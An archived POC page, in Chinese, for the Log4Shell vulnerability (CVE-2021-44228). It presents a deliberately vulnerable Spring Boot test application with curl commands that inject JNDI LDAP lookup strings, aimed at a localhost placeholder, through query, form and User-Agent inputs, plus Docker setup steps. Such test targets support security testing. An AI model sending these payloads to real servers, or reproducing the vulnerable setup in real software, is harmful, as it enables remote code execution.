POC详情: 1ba975399a2263c9e921574a495b016ff36a68cf

来源
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
CVE-2021-44228
介绍
# Log4j 2 CVE-2021-44228 测试样本应用

基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

## 可用接口

| 接口 | 请求方法 | 参数 |
|-----|-----|-----|
| `vulnerable_request_get` | GET | v=payload |
| `vulnerable_request_post` | POST | v=payload |
| `vulnerable_request_header_ua` | GET / POST | Header `User-Agent` |

## 测试可用

* GET
```shell
$ curl 'http://[targetIP]:8080/vulnerable_request_get?v=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%2Ffake%7D'
{"method":"vulnerable_request_get","payload":"${jndi:ldap://127.0.0.1/fake}"}
```

* POST
```shell
$ curl -X POST -F 'v=${jndi:ldap://127.0.0.1/fake}' 'http://[targetIP]:8080/vulnerable_request_post'
{"method":"vulnerable_request_post","payload":"${jndi:ldap://127.0.0.1/fake}"}
```
* UserAgent
```shell
$ curl 'http://[targetIP]:8080/vulnerable_request_header_ua' --user-agent '${jndi:ldap://127.0.0.1/fake}'
{"method":"vulnerable_request_header_ua","payload":"${jndi:ldap://127.0.0.1/fake}"}
```

## 快速启动
```shell
docker run -p 8080:8080 ghcr.io/zzzz0317/log4j2-vulnerable-spring-app:latest
```
注:当前镜像基于 [openjdk:8u111-jdk](https://hub.docker.com/layers/openjdk/library/openjdk/8u111-jdk/images/sha256-c1ff613e8ba25833d2e1940da0940c3824f03f802c449f3d1815a66b7f8c0e9d?context=explore)
## 构建镜像
```shell
docker build -t log4j2-vulnerable-spring-app:latest .
docker run -p 8080:8080 log4j2-vulnerable-spring-app:latest
```
文件快照

[4.0K] /data/pocs/1ba975399a2263c9e921574a495b016ff36a68cf ├── [ 230] Dockerfile ├── [1.0K] LICENSE ├── [9.8K] mvnw ├── [6.5K] mvnw.cmd ├── [1.9K] pom.xml ├── [1.4K] README.md └── [4.0K] src ├── [4.0K] main │   ├── [4.0K] java │   │   └── [4.0K] net │   │   └── [4.0K] asec01 │   │   └── [4.0K] log4j2springvulnerableapp │   │   ├── [ 379] Log4j2SpringVulnerableAppApplication.java │   │   ├── [1.8K] MainController.java │   │   └── [ 524] Response.java │   └── [4.0K] resources │   ├── [ 1] application.properties │   └── [4.0K] public │   └── [ 789] test.html └── [4.0K] test └── [4.0K] java └── [4.0K] net └── [4.0K] asec01 └── [4.0K] log4j2springvulnerableapp └── [ 256] Log4j2SpringVulnerableAppApplicationTests.java 13 directories, 12 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。